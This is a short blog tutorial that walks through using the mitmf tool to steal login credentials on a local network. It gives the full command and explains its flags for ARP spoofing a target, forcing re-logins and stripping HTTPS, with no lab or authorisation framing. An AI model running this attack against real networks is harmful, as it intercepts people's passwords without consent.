Home 0P3N Blog MITMF-1: Sniffing Passwords Using Man in the Middle Framework
Ready to Start Your Career?
Create Free Account
Ajay Kulals profile image
By: Ajay Kulal
June 28, 2016

MITMF-1: Sniffing Passwords Using Man in the Middle Framework

By: Ajay Kulal
June 28, 2016
Ajay Kulals profile image
By: Ajay Kulal
June 28, 2016
abstract-cybraryHello Friends!!This is my first article for a Man-In-The-Middle Attack series.In this article, we'll see how to sniff passwords using a MITMF framework. I use a framework tool for Man-In-The-Middle attacks and you can read more about it here. So, let's get started...1. It's good habit to first read the Man Page or Help Page about any tool or command. To see the MITMF frameworks man page, type in MITMF command without any arguments: mitmf2. After you've gone through all the options available under mitmf framework, lets do some real hacking. Open your Kali Linux terminal and type this command:

mitmf -i wlan0 --gateway 192.168.0.1 --arp --spoof --target 192.168.0.4 -k --hsts

command-imagecommand explanation:

--i: Is used to define the network interface. In the case above, it's wlan0.

--gateway: Is used to define the router's address In the above command, it's 192.168.0.1

--spoof: Loads plugin Spoof.

--arp: Redirects traffic using ARP spoofing.

--target: Is the victims IP address. In the above command, it's 192.168.0.4

--k: Kills the current login sessions and forces victim to re-login.

--hsts: Enables SSLstrip+ for partial HSTS bypass.

 3. Wait for user to login with their credentials and you'll get their credentials. That's it.Sniffed-password Thank you everyone for reading this article. There's lot more interesting stuff coming in the next articles, because MITMF has endless capabilities. :)Please comment if I've made any mistakes and if you'd like to suggest something.Thank you.
Schedule Demo

Build your Cybersecurity or IT Career

Accelerate in your role, earn new certifications, and develop cutting-edge skills using the fastest growing catalog in the industry